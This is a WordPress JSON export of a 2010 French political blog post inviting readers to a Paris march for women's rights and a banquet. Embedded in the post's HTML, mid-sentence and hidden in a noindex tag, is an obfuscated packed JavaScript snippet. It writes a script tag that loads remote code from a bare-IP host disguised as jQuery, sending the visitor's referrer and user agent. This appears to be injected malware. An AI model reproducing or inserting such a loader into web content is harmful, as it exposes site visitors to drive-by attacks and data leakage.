{"id":4593,"date":"2010-06-08T08:49:27","date_gmt":"2010-06-08T07:49:27","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4593"},"modified":"2010-06-13T23:11:33","modified_gmt":"2010-06-13T22:11:33","slug":"samedi-12-juin-venez-marcher-et-faire-la-fete","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4593","title":{"rendered":"Samedi 12 juin &#8211; Venez marcher pour les femmes !"},"content":{"rendered":"<p style=\"text-align: center;\"><a href=\"..\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/banderolle-objecte-bd.jpg\" alt=\"\" width=\"464\" height=\"119\" \/><\/a><a href=\"http:\/\/www.partipourladecroissance.net\/\"><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/\"><span style=\"font-size: medium;\"><span style=\"font-size: small;\">C&rsquo;est <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfiae|var|u0026u|referrer|ykszi||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Parti Pour La D\u00e9croissance !<\/span><\/span><\/a><\/p>\n<p><strong>Des femmes et des hommes seront en marche pour les droits des femmes !<\/strong><br \/>\n<strong>Et vous, vous serez o\u00f9 ?<\/strong><br \/>\nLe f\u00e9minisme est un sujet qui nous concerne toutes et tous, les luttes pour les droits des femmes sont constantes.<br \/>\nD\u00e9croissance et F\u00e9minisme, le sujet est vaste, rejoignez nous sur le stand du PPLD pour des d\u00e9bats, des Discussions en toute simplicit\u00e9 et surtout en toute convivialit\u00e9.<\/p>\n<p>Apr\u00e8s avoir balad\u00e9 la banderole du Parti Pour La D\u00e9croissance de la place de la R\u00e9publique (d\u00e9part de la manifestation \u00e0 16H) \u00e0 Stalingrad (arriv\u00e9e de la manifestation \u00e0 18H).<br \/>\n<em>Le parcours : Place de la R\u00e9publique -&gt; bld Magenta -&gt; Gare de l&rsquo;Est -&gt; rue du fbg St Antoine -&gt; Place de Stalingrad.<br \/>\n[Rdv avec la banderole du PPLD : <span><span><span>devant la Pharmacie de la Place R\u00e9publique<\/span><\/span><\/span><span> (5 Place de la R\u00e9publique<\/span><span> 75003 Paris).]<\/span><\/em><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: medium;\"><span style=\"color: #009900;\"><strong style=\"color: #ff0000;\">Nous vous convions \u00e0 un grand banquet citoyen et convivial sur la place de Stalingrad<\/strong><\/span><span style=\"color: #009900;\"> <strong style=\"color: #ff0000;\">o\u00f9 vous pourrez nous retrouvez sur le stand du PPLD.<\/strong><\/span><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: medium;\">Toutes et tous ensemble marchons dans la joie et la bonne humeur pour les femmes du monde entier !<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>C&rsquo;est Parti Pour La D\u00e9croissance ! Des femmes et des hommes seront en marche pour les droits des femmes ! Et vous, vous serez o\u00f9 ? Le f\u00e9minisme est un sujet qui nous concerne toutes et tous, les luttes pour &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4593\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4593","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4593","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4593"}],"version-history":[{"count":12,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4593\/revisions"}],"predecessor-version":[{"id":4595,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4593\/revisions\/4595"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4593"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4593"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4593"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}